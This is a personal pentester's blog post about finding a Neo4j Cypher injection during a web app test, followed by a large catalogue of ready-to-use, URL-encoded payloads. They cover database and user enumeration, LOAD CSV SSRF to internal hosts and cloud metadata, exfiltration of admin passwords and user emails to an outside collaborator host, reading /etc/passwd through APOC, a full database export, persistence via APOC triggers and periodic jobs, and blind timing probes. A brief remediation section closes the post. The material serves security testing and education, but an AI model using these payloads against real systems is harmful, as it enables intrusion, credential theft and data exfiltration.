That Time I Found a Neo4j Cypher Injection (and How to Exploit It)

Hey y'all 🤠 it's been a while...

2025 really went by and I've been processing SO much stuff happening in my personal life, work, everything. It's safe to say, and I'm grateful to say it (yes I've been doing affirmations, don't judge), that I'm still alive, still living, and still doing cyber.

So um, this blog post has been delayed for almost a year. I was going to write it when my brain was still fresh with all the technical details but procrastination got a hold of me. Also doomscrolling on reels.

I heard from TikTok that my 5-9 after 9-5 shouldn't be about work, but sometimes you find cool stuff at work that you just have to post about and this is where I am at. Plus I think writing blog posts is marginally better than scrolling mindlessly through another influencer's scandal. (I am culturally connected to the internet and my internet haha hehes after 9-5 aren't usually about cyber at all; it's just random cultural moments full of influencer cancellations, brainrot memes, etc etc.)

anyways.

So I found this vulnerability when I was at work during a web app test. The app had this complex workflow system; I'm not sure how else to describe it but tl;dr: it had pretty graphs.

Turns out, pretty graphs need special databases. Who knew? Not me! I legitimately didn't know graph databases were a thing until now. I thought we peaked at SQL and NoSQL and called it a day. But no, apparently there's a whole other category for when your data looks like a spider web drawn by someone on their third espresso.

So while running Burp like any other Tuesday (or was it Thursday? Time is a construct when you're staring at HTTP requests all day), on a random API endpoint, I get this error that's definitely not SQL, but looks almost like it.

{code: Neo.ClientError.Statement.SyntaxError} {message: Invalid input '}': expected ")", "WHERE", "{" or a parameter...

Little did I know I was about to learn so much about graph databases and their quirks.

Wait, What Even Is Neo4j?

This is a crash course (or curse) nobody asked for. IYKYK, you can skip this bit.

Neo4j is a graph database, which sounds fancy but it's basically a database that thinks everything is connected to everything else. Instead of boring tables with rows and columns (looking at you SQL), it stores data as nodes (things) and relationships (how things connect). It's like if your database watched too many conspiracy theory videos and started connecting everything with red string.

If you've ever used BloodHound for Active Directory pentesting, congratulations! You've already been using Neo4j without knowing it. BloodHound runs on Neo4j because when you're trying to figure out how Bob from Accounting can somehow become Domain Admin in three clicks, you NEED those relationship mappings.

There's apparently this whole cult following for Neo4j that I wasn't invited to. Like, there are people who REALLY love graph databases. They have conferences. They have merch. They probably have inside jokes about nodes and edges that would go over my head.

The query language is called Cypher. Instead of SELECT * FROM users, you write stuff like MATCH (n:User) RETURN n which honestly reads like you're casting a spell. The whole syntax is built around drawing patterns, which is either genius or cursed depending on how your brain works.

Let me show some examples:

SQL vs Cypher

Finding all users (basic but essential):

// SQL
SELECT * FROM users;

// Cypher
MATCH (n:User) RETURN n;

Finding users named "Alice":

// SQL
SELECT * FROM users WHERE name = 'Alice';

// Cypher
MATCH (n:User {name: 'Alice'}) RETURN n;

Okay so stay with me, finding who your friends are:

// SQL (pain)
SELECT u2.* FROM users u1
JOIN friendships f ON u1.id = f.user_id
JOIN users u2 ON f.friend_id = u2.id
WHERE u1.name = 'Alice';

// Cypher (chef's kiss)
MATCH (alice:User {name: 'Alice'})-[:FRIENDS_WITH]->(friend)
RETURN friend;

Finding friends of friends (this is where SQL developers cry):

// SQL (I'm not even going to write this monstrosity)
// It involves multiple self-joins and your DBA will hate you

// Cypher (literally just add more arrows)
MATCH (alice:User {name: 'Alice'})-[:FRIENDS_WITH]->()-[:FRIENDS_WITH]->(fof)
RETURN DISTINCT fof;

The relationship syntax is where Cypher really pops off. Look at these patterns:

--> means "goes to" (directed relationship)

-- means "connected to" (undirected)

-[:LIKES]-> means "connected by a LIKES relationship"

-[r:LIKES]-> means "give me that relationship and call it 'r'"

How to Exploit Cypher Injection

My first attempt was trying to find Cypher's equivalent of a print function. You know how in Python you can just print("hello") and see if your code runs? I was looking for something that would echo back to me.

GET /api/workflow/items?nodeType=Task)%20RETURN%20'hello'%20//&ref=7a8b9c0d-1e2f-3g4h-5i6j-7k8l9m0n1o2p

(The ref value is just a random UUID.)

And the app said:

HTTP/1.1 400 Bad Request
{
  "error": {
    "code": "Neo.ClientError.Statement.SyntaxError",
    "message": "Variable `Task` not defined (line 1, column 8)"
  }
}

Wait what? Oh... OH. It's not reading the label Task as a string label, it thinks it's a variable. Let me try wrapping it differently.

I kept getting a lot of error messages because I was literally learning the syntax through violence (violence against the API to be clear).

I learned that:

Cypher uses MATCH patterns like (n:Label).
You can't just throw parentheses wherever (unlike SQL where you can kinda wing it).
RETURN is (almost) mandatory: a read query can't just MATCH and call it a day, it has to end in RETURN (or an update clause, or a procedure call).
The error messages actually tell you EXACTLY where your syntax broke.
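
To picture why closing the parenthesis matters, here's a toy model in Python of what string-built Cypher looks like on the server side. The template, the `build_query` name and the `n.ref` property are all assumptions for illustration; it is not the real query from the test (which clearly wasn't this simple, given the error above). The only point is what happens when input gets pasted into the query text.

```python
# Hypothetical server-side template, made up for illustration.
# It mirrors the "MATCH (n:<nodeType>)" shape hinted at by the error messages.
TEMPLATE = "MATCH (n:{node_type}) WHERE n.ref = $ref RETURN n"


def build_query(node_type):
    """Unsafe on purpose: the label is pasted straight into the query text."""
    return TEMPLATE.format(node_type=node_type)


# Normal use: the value stays inside the label position
print(build_query("Task"))

# Injected value: closes the node pattern, adds its own RETURN,
# and comments out whatever the template had after it
print(build_query("Task) RETURN 'hello' //"))
```

Everything after `//` is a comment to Cypher, so the original tail of the query stops mattering once the payload is in place.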

Here are some error messages that pretty much confirm Cypher injection, if you come across one during a pentest:

// This beautiful error when you mess up parentheses:
{
  "code": "Neo.ClientError.Statement.SyntaxError",
  "message": "Invalid input ')': expected WHERE, WITH, MATCH, RETURN (line 1, column 45)"
}

// My favorite, when Neo4j tells you exactly what it parsed:
{
  "code": "Neo.ClientError.Statement.SyntaxError",
  "message": "Query cannot conclude with MATCH (line 1, column 1)\n\"MATCH (n:ApprovalRequest)) MATCH (x:User"
}
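
If you're grepping a pile of responses for errors like these, a small helper can pull the status codes out for you. This is a rough Python sketch: the regex assumes the usual `Neo.<Classification>.<Category>.<Title>` shape of Neo4j status codes, and `find_neo4j_codes` is a made-up name.

```python
import re

# Neo4j status codes look like Neo.ClientError.Statement.SyntaxError
NEO4J_CODE = re.compile(
    r"Neo\.(?:ClientError|ClientNotification|TransientError|DatabaseError)"
    r"\.[A-Za-z]+\.[A-Za-z]+"
)


def find_neo4j_codes(response_body):
    """Return the distinct Neo4j status codes found in a response body, sorted."""
    return sorted(set(NEO4J_CODE.findall(response_body)))


body = '{"error": {"code": "Neo.ClientError.Statement.SyntaxError", "message": "..."}}'
print(find_neo4j_codes(body))
```

Any hit on a response to your own weird input is a strong hint that the input reached a Cypher parser.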

Okay so now, here are some payloads you can try with vanilla Cypher injection. I added the URL-encoded versions in case you need them. (Remember, my injection point above was a URL parameter, so everything needed to be URL encoded, which is why my notes look like someone smashed their keyboard.)

Basic Injection Testing

Simple return test:

RETURN 1337 //
// If URL encoded: RETURN%201337%20//

System Information Queries

(My faves, these are probably the most important for understanding what you're dealing with)

Get Neo4j version:

CALL dbms.components() YIELD name, versions UNWIND versions AS version RETURN name, version //
// If URL encoded: CALL%20dbms.components()%20YIELD%20name,%20versions%20UNWIND%20versions%20AS%20version%20RETURN%20name,%20version%20//

List all procedures (goldmine for finding what's available; note that dbms.procedures() was removed in Neo4j 5 in favor of SHOW PROCEDURES):

CALL dbms.procedures() YIELD name RETURN name //
// If URL encoded: CALL%20dbms.procedures()%20YIELD%20name%20RETURN%20name%20//

List all functions (same deal: removed in Neo4j 5, replaced by SHOW FUNCTIONS):

CALL dbms.functions() YIELD name RETURN name //
// If URL encoded: CALL%20dbms.functions()%20YIELD%20name%20RETURN%20name%20//

Get current user info:

CALL dbms.showCurrentUser() YIELD username, roles RETURN username, roles //
// If URL encoded: CALL%20dbms.showCurrentUser()%20YIELD%20username,%20roles%20RETURN%20username,%20roles%20//

List all users (if you have admin priv):

CALL dbms.security.listUsers() YIELD username, roles RETURN username, roles //
// If URL encoded: CALL%20dbms.security.listUsers()%20YIELD%20username,%20roles%20RETURN%20username,%20roles%20//

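Check query execution plan (reveals internal structure; EXPLAIN has to be the very first thing in the query, so this only works if your injection point is at the start):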

EXPLAIN MATCH (n) RETURN n //
// If URL encoded: EXPLAIN%20MATCH%20(n)%20RETURN%20n%20//

Get database info:

CALL dbms.database.info() YIELD name, currentStatus RETURN name, currentStatus //
// If URL encoded: CALL%20dbms.database.info()%20YIELD%20name,%20currentStatus%20RETURN%20name,%20currentStatus%20//

List all databases:

SHOW DATABASES //
// If URL encoded: SHOW%20DATABASES%20//

Get configuration values:

CALL dbms.listConfig() YIELD name, value WHERE name CONTAINS 'auth' RETURN name, value //
// If URL encoded: CALL%20dbms.listConfig()%20YIELD%20name,%20value%20WHERE%20name%20CONTAINS%20'auth'%20RETURN%20name,%20value%20//

Memory and JVM info:

CALL dbms.queryJmx('java.lang:type=Memory') YIELD name, attributes RETURN name, attributes //
// If URL encoded: CALL%20dbms.queryJmx('java.lang:type%3DMemory')%20YIELD%20name,%20attributes%20RETURN%20name,%20attributes%20//

Transaction info:

CALL dbms.listTransactions() YIELD transactionId, username, startTime RETURN * //
// If URL encoded: CALL%20dbms.listTransactions()%20YIELD%20transactionId,%20username,%20startTime%20RETURN%20*%20//

Other Extraction Techniques

Collecting data:

MATCH (n:User) RETURN collect(n.name) //
// If URL encoded: MATCH%20(n:User)%20RETURN%20collect(n.name)%20//

Note: You don't actually need the URL encoded versions if you're testing through Burp or similar tools. They'll handle the encoding for you. But if you're crafting requests manually or debugging why your payload isn't working, knowing what the encoded version looks like is super helpful.
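
If you do end up encoding by hand, here's a minimal Python sketch that produces the same style of encoding as the payloads above. The `encode_payload` name and the choice of which characters to leave alone are my assumptions; leaving them unencoded just keeps the output readable.

```python
from urllib.parse import quote

# Left unencoded to mirror the hand-encoded payloads above; this set is a
# readability choice, not a requirement (encoding more characters is fine).
SAFE_CHARS = "/:(),'*"


def encode_payload(payload):
    """Percent-encode a Cypher payload for use in a URL query parameter."""
    return quote(payload, safe=SAFE_CHARS)


print(encode_payload("RETURN 1337 //"))  # RETURN%201337%20//
```

Characters like `&`, `#`, `+` and `=` do get encoded here, which matters because they have their own meaning inside a query string.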

LOAD CSV

Neo4j has this feature called LOAD CSV that's meant for importing data from CSV files. Sounds innocent enough, right? Like "oh hey, let me import this spreadsheet into my graph database yay."

But here's the thing, it doesn't just load local files. It can fetch from URLs. External URLs. Your URLs.

It's like finding out your calculator can make phone calls. Like, technically it makes sense when you think about it, but also... why??

How LOAD CSV Works (And Why It's Perfect for SSRF)

So here's the deal with LOAD CSV. It's designed to fetch CSV data from a URL and parse it into rows you can work with. But Neo4j doesn't really care if your "CSV" is actually a CSV. It just makes an HTTP GET request to whatever URL you give it.

The basic syntax looks like:

LOAD CSV FROM 'https://example.com/data.csv' AS row RETURN row

But when you're injecting, you're probably doing something more like:

LOAD CSV FROM 'https://your-collaborator.com/test' AS line RETURN 1 //
// If URL encoded: LOAD%20CSV%20FROM%20'https://your-collaborator.com/test'%20AS%20line%20RETURN%201%20//

SSRF Payloads That Actually Work

Basic SSRF Test

Just checking if it reaches out:

LOAD CSV FROM 'https://[random-string].oastify.com/basic' AS line RETURN count(*) //
// If URL encoded: LOAD%20CSV%20FROM%20'https://[random-string].oastify.com/basic'%20AS%20line%20RETURN%20count(*)%20//

SSRF with Context

Adding some context to know which injection point worked:

LOAD CSV FROM 'https://[random-string].oastify.com/injection-worked' AS x RETURN 1 //
// If URL encoded: LOAD%20CSV%20FROM%20'https://[random-string].oastify.com/injection-worked'%20AS%20x%20RETURN%201%20//

Data Exfiltration via URL

This is where it gets wild. You can exfiltrate data in the URL itself:

Simple version:

MATCH (n:User {role:'admin'}) WITH n.password AS pwd LOAD CSV FROM 'https://[random-string].oastify.com/exfil?password=' + pwd AS line RETURN 1 //
// If URL encoded: MATCH%20(n:User%20{role:'admin'})%20WITH%20n.password%20AS%20pwd%20LOAD%20CSV%20FROM%20'https://[random-string].oastify.com/exfil?password='%20%2B%20pwd%20AS%20line%20RETURN%201%20//

Multiple values (toString() doesn't accept a list, so glue the values together with reduce() first):

MATCH (n:User) WITH collect(n.email) AS emails LOAD CSV FROM 'https://[random-string].oastify.com/exfil?data=' + reduce(acc = '', e IN emails | acc + e + ',') AS line RETURN 1 //
// If URL encoded: MATCH%20(n:User)%20WITH%20collect(n.email)%20AS%20emails%20LOAD%20CSV%20FROM%20'https://[random-string].oastify.com/exfil?data='%20%2B%20reduce(acc%20%3D%20'',%20e%20IN%20emails%20%7C%20acc%20%2B%20e%20%2B%20',')%20AS%20line%20RETURN%201%20//
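
On the receiving end, whatever got exfiltrated shows up in the request line of your OAST interaction log. Here's a small Python sketch for pulling the values back out; the `extract_exfil` name and the sample values are hypothetical.

```python
from urllib.parse import urlsplit, parse_qs


def extract_exfil(request_target):
    """Parse the query string of a logged request path into {param: [values]}."""
    return parse_qs(urlsplit(request_target).query, keep_blank_values=True)


# Sample request paths as they might appear in an interaction log (made up)
print(extract_exfil("/exfil?password=hunter2"))
print(extract_exfil("/exfil?data=alice@example.com"))
```

One thing to keep in mind: `parse_qs` turns a literal `+` into a space, and a raw `&` or `#` in the stolen value will cut it short, so values with those characters may come back mangled.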

Internal Network Scanning

You can use SSRF to scan internal networks:

Check internal services:

LOAD CSV FROM 'http://localhost:8080/admin' AS line RETURN line //
// If URL encoded: LOAD%20CSV%20FROM%20'http://localhost:8080/admin'%20AS%20line%20RETURN%20line%20//

Scan internal IPs:

LOAD CSV FROM 'http://192.168.1.1/' AS line RETURN line LIMIT 1 //
// If URL encoded: LOAD%20CSV%20FROM%20'http://192.168.1.1/'%20AS%20line%20RETURN%20line%20LIMIT%201%20//

Cloud metadata endpoints (the classic):

LOAD CSV FROM 'http://169.254.169.254/latest/meta-data/' AS line RETURN line //
// If URL encoded: LOAD%20CSV%20FROM%20'http://169.254.169.254/latest/meta-data/'%20AS%20line%20RETURN%20line%20//

Working with Headers

When I say a CSV "has headers," I'm talking about how CSV files often have a first row that describes what each column contains. Like imagine a URL that returns this CSV:

username,email,role
alice,alice@example.com,admin

With headers, you can access values by name instead of index:

LOAD CSV WITH HEADERS FROM 'https://[random-string].oastify.com/data.csv' AS row RETURN row //
// If URL encoded: LOAD%20CSV%20WITH%20HEADERS%20FROM%20'https://[random-string].oastify.com/data.csv'%20AS%20row%20RETURN%20row%20//
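
If the index-versus-name thing feels abstract, Python's `csv` module has the same split, so here's a quick analogy (this is plain Python, not Neo4j, and the sample data is just the example CSV from above). Plain `LOAD CSV` gives you each row as a list, like `csv.reader`; `WITH HEADERS` gives you each row as a map, like `csv.DictReader`.

```python
import csv
import io

SAMPLE = "username,email,role\nalice,alice@example.com,admin\n"

# Like plain LOAD CSV: every row is a list, and the header line is just row 0
rows = list(csv.reader(io.StringIO(SAMPLE)))
print(rows[1][0])  # alice

# Like LOAD CSV WITH HEADERS: the first line becomes the keys of each row
records = list(csv.DictReader(io.StringIO(SAMPLE)))
print(records[0]["username"])  # alice
```

In Cypher terms that's the difference between `row[0]` and `row.username`.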

Handling Errors and Timeouts

Testing timeout behavior (port 81 is usually closed so this helps you see timeout errors):

LOAD CSV FROM 'https://[random-string].oastify.com:81/timeout-test' AS line RETURN 1 //
// If URL encoded: LOAD%20CSV%20FROM%20'https://[random-string].oastify.com:81/timeout-test'%20AS%20line%20RETURN%201%20//

The Privilege Problem (Why Your SSRF Might Not Work)

Not all database users can use LOAD CSV freely. Neo4j has this thing where certain operations require specific privileges. The main privilege you need is usually part of the reader role or higher, but here's the catch:

Community Edition: Usually more permissive
Enterprise Edition: Might have stricter role-based access control

You might see errors like:

{
  "code": "Neo.ClientError.Security.Forbidden",
  "message": "LOAD CSV is not allowed for user 'readonly' with roles [PUBLIC]"
}

If you hit this, don't give up. Try to enumerate what privileges you DO have:

Check your current user and roles:

CALL dbms.showCurrentUser() //
// If URL encoded: CALL%20dbms.showCurrentUser()%20//

Sometimes admins configure custom roles that might have unexpected permissions. There are cases where:

Read-only users could still use LOAD CSV (whoops)
Authenticated users had more perms than intended
The app connected with way too many privileges

APOC: Neo4j's DLC (and how to abuse it)

Okay so, APOC. Yay! This is the fun bit. Really, I promise it is.

APOC stands for "Awesome Procedures on Cypher" which already tells you everything you need to know about the vibe. It's like someone looked at Neo4j and said "you know what this needs? MORE FEATURES." And then they actually did it.

First Things First: Is APOC Even There?

Before you get all excited, you gotta check if APOC is actually available. Here's how I usually test:

Quick check:

RETURN apoc.version() //
// If URL encoded: RETURN%20apoc.version()%20//

List all APOC procedures (this is a goldmine):

CALL dbms.procedures() YIELD name WHERE name STARTS WITH 'apoc' RETURN name //
// If URL encoded: CALL%20dbms.procedures()%20YIELD%20name%20WHERE%20name%20STARTS%20WITH%20'apoc'%20RETURN%20name%20//

Get help on specific APOC categories:

CALL apoc.help('load') YIELD name, text RETURN name, text //
// If URL encoded: CALL%20apoc.help('load')%20YIELD%20name,%20text%20RETURN%20name,%20text%20//

APOC has like 450+ procedures and functions. I'm not even joking. It's like Neo4j's expansion pack. Here are the ones that made my heart sing:

File System Access

Reading files:

CALL apoc.load.json('file:///etc/passwd') YIELD value RETURN value //
// If URL encoded: CALL%20apoc.load.json('file:///etc/passwd')%20YIELD%20value%20RETURN%20value%20//

Listing directories:

CALL apoc.load.directory('*', 'file:///var/log') YIELD value RETURN value //
// If URL encoded: CALL%20apoc.load.directory('*',%20'file:///var/log')%20YIELD%20value%20RETURN%20value%20//

Network Requests (LOAD CSV's Cooler Cousin)

Making HTTP requests with more control:

CALL apoc.load.jsonParams('https://[random-string].oastify.com/apoc-test', {}, null) YIELD value RETURN value //
// If URL encoded: CALL%20apoc.load.jsonParams('https://[random-string].oastify.com/apoc-test',%20{},%20null)%20YIELD%20value%20RETURN%20value%20//

With custom headers:

CALL apoc.load.jsonParams('https://internal-api.local/data', {Authorization: 'Bearer stolen-token'}, null) YIELD value RETURN value //
// If URL encoded: CALL%20apoc.load.jsonParams('https://internal-api.local/data',%20{Authorization:%20'Bearer%20stolen-token'},%20null)%20YIELD%20value%20RETURN%20value%20//

Database Shenanigans

Running periodic background jobs (persistence anyone?):

CALL apoc.periodic.repeat('hack', 'LOAD CSV FROM "https://[random-string].oastify.com/ping" AS line RETURN 1', 60) //
// If URL encoded: CALL%20apoc.periodic.repeat('hack',%20'LOAD%20CSV%20FROM%20%22https://[random-string].oastify.com/ping%22%20AS%20line%20RETURN%201',%2060)%20//

Export entire database:

CALL apoc.export.json.all('https://[random-string].oastify.com/db-dump.json') //
// If URL encoded: CALL%20apoc.export.json.all('https://[random-string].oastify.com/db-dump.json')%20//

The Plugin Situation (It Gets Better/Worse)

APOC is modular. There's core APOC, and then there's APOC Extended, and then there are plugins for APOC. It's like DLC for your DLC.

Sometimes admins install extra stuff without realising what they're enabling:

Checking for Elasticsearch integration:

CALL apoc.es.info('http://localhost:9200') YIELD value RETURN value //
// If URL encoded: CALL%20apoc.es.info('http://localhost:9200')%20YIELD%20value%20RETURN%20value%20//

MongoDB access (because why not):

CALL apoc.mongodb.find('mongodb://localhost:27017', 'database.collection', {}) YIELD value RETURN value //
// If URL encoded: CALL%20apoc.mongodb.find('mongodb://localhost:27017',%20'database.collection',%20{})%20YIELD%20value%20RETURN%20value%20//

JDBC connections (this one's nice):

CALL apoc.load.jdbc('jdbc:mysql://internal-db:3306/prod', 'SELECT * FROM users') YIELD row RETURN row //
// If URL encoded: CALL%20apoc.load.jdbc('jdbc:mysql://internal-db:3306/prod',%20'SELECT%20*%20FROM%20users')%20YIELD%20row%20RETURN%20row%20//

My Favorite APOC Discoveries

The "Why Does This Even Exist" Award Goes To:

System information disclosure:

CALL apoc.metrics.get() YIELD value RETURN value //
// If URL encoded: CALL%20apoc.metrics.get()%20YIELD%20value%20RETURN%20value%20//

This dumps JVM metrics, heap usage, thread counts... thanks for the free recon?

The "This Should Be Illegal" Award:

Executing Cypher from strings:

CALL apoc.cypher.run('MATCH (n) RETURN n', {}) YIELD value RETURN value //
// If URL encoded: CALL%20apoc.cypher.run('MATCH%20(n)%20RETURN%20n',%20{})%20YIELD%20value%20RETURN%20value%20//

You can build dynamic queries.

The "Persistence Is Key" Award:

Creating triggers (yes, triggers in a graph database):

CALL apoc.trigger.add('myTrigger', 'MATCH (n:User) WHERE n.email CONTAINS "@admin" LOAD CSV FROM "https://[random-string].oastify.com/admin-created" AS x RETURN 1', {phase: 'after'}) //
// If URL encoded: CALL%20apoc.trigger.add('myTrigger',%20'MATCH%20(n:User)%20WHERE%20n.email%20CONTAINS%20%22@admin%22%20LOAD%20CSV%20FROM%20%22https://[random-string].oastify.com/admin-created%22%20AS%20x%20RETURN%201',%20{phase:%20'after'})%20//

Things That Didn't Work (But I Tried Anyway)

Not everything in APOC is enabled by default. Some procedures need specific config settings:

Shell commands (sadly usually disabled):

CALL apoc.shell.run('whoami') YIELD value RETURN value //
// This usually fails with "procedure not found" or "disabled"

Writing files (also usually disabled):

CALL apoc.export.csv.query('MATCH (n) RETURN n', 'file:///tmp/dump.csv', {}) //
// Security says no

Sometimes you might not get those beautiful error messages back. The app just returns a generic 500 or worse, the same response regardless. This is where time-based and boolean-based techniques come in handy.

Boolean-based (when the app changes behavior based on true/false):

' OR 1=1 WITH 1 as a RETURN a //  -- True condition
' OR 1=2 WITH 1 as a RETURN a //  -- False condition

Time-based (making the database EEPY):

CALL apoc.util.sleep(5000) RETURN 1 //  -- 5 second delay
// If URL encoded: CALL%20apoc.util.sleep(5000)%20RETURN%201%20//

Without APOC, you can use expensive operations:

MATCH (a), (b), (c), (d), (e) RETURN count(*) //  -- Cartesian product goes brrrr
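
Deciding whether a delay "happened" is easier if you compare against a baseline instead of eyeballing it. Here's a minimal Python sketch of that comparison; the `delay_detected` name, the half-second slack and the sample timings are all assumptions, and you'd feed it response times you measured yourself.

```python
from statistics import median


def delay_detected(baseline_s, probe_s, injected_delay_s=5.0, slack_s=0.5):
    """True if probe requests were slower than baseline by about the injected delay.

    baseline_s and probe_s are lists of response times in seconds.
    Medians are used so a single network hiccup doesn't decide the result.
    """
    return median(probe_s) - median(baseline_s) >= injected_delay_s - slack_s


# Timings below are invented sample numbers, not measurements
print(delay_detected([0.21, 0.25, 0.22], [5.3, 5.2, 5.4]))     # True
print(delay_detected([0.21, 0.25, 0.22], [0.24, 0.40, 0.23]))  # False
```

For the Cartesian product trick there's no fixed delay to compare against, so you'd just look for probe timings that are consistently and clearly above baseline.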

How to Fix If You're a Developer

My job is literally to break stuff. But here's how you can make my job harder (please don't do this):

Parameterized Queries

// BAD - I will find this and I will exploit it
const badQuery = `MATCH (n:User {name: '${userInput}'}) RETURN n`;

// GOOD - This makes me sad (but secure)
// $username is a Cypher parameter that the driver fills in, not JS string interpolation
const query = 'MATCH (n:User {name: $username}) RETURN n';
session.run(query, { username: userInput });
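
One catch worth knowing: the injection point in this story was a label (`nodeType`), and Cypher parameters have traditionally only been able to stand in for values, not labels or relationship types. For that case the usual approach is an allowlist. Here's a minimal sketch in Python (the same idea applies in any language); `ALLOWED_LABELS`, `build_items_query` and the `n.ref` property are hypothetical names, and the label set is borrowed from the error messages above purely as an example.

```python
# Hypothetical allowlist; in a real app this would be the labels in your own schema
ALLOWED_LABELS = {"Task", "ApprovalRequest"}


def build_items_query(node_type, ref):
    """Return (query, params) with the label checked against a fixed allowlist."""
    if node_type not in ALLOWED_LABELS:
        raise ValueError(f"unsupported nodeType: {node_type!r}")
    # Safe to interpolate: node_type is now one of our own known strings.
    # The value part still goes through a real Cypher parameter.
    query = f"MATCH (n:`{node_type}`) WHERE n.ref = $ref RETURN n"
    return query, {"ref": ref}


query, params = build_items_query("Task", "some-ref-value")
print(query)
print(params)
```

The returned pair is meant to be handed to the driver's `session.run(query, params)`, so user input only ever travels as a parameter or as a value you already had in the allowlist.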

Quick Checklist:

Use parameterized queries ALWAYS (yes, even for that "internal only" endpoint)
Disable LOAD CSV from external URLs if you don't need it
If using APOC, whitelist (allowlist? people say allowlist) only the procedures you actually need (that's the dbms.security.procedures.allowlist setting in neo4j.conf)
Use proper role-based access (your app doesn't need to be a Neo4j admin)
Input validation is nice but it's not a replacement for parameterization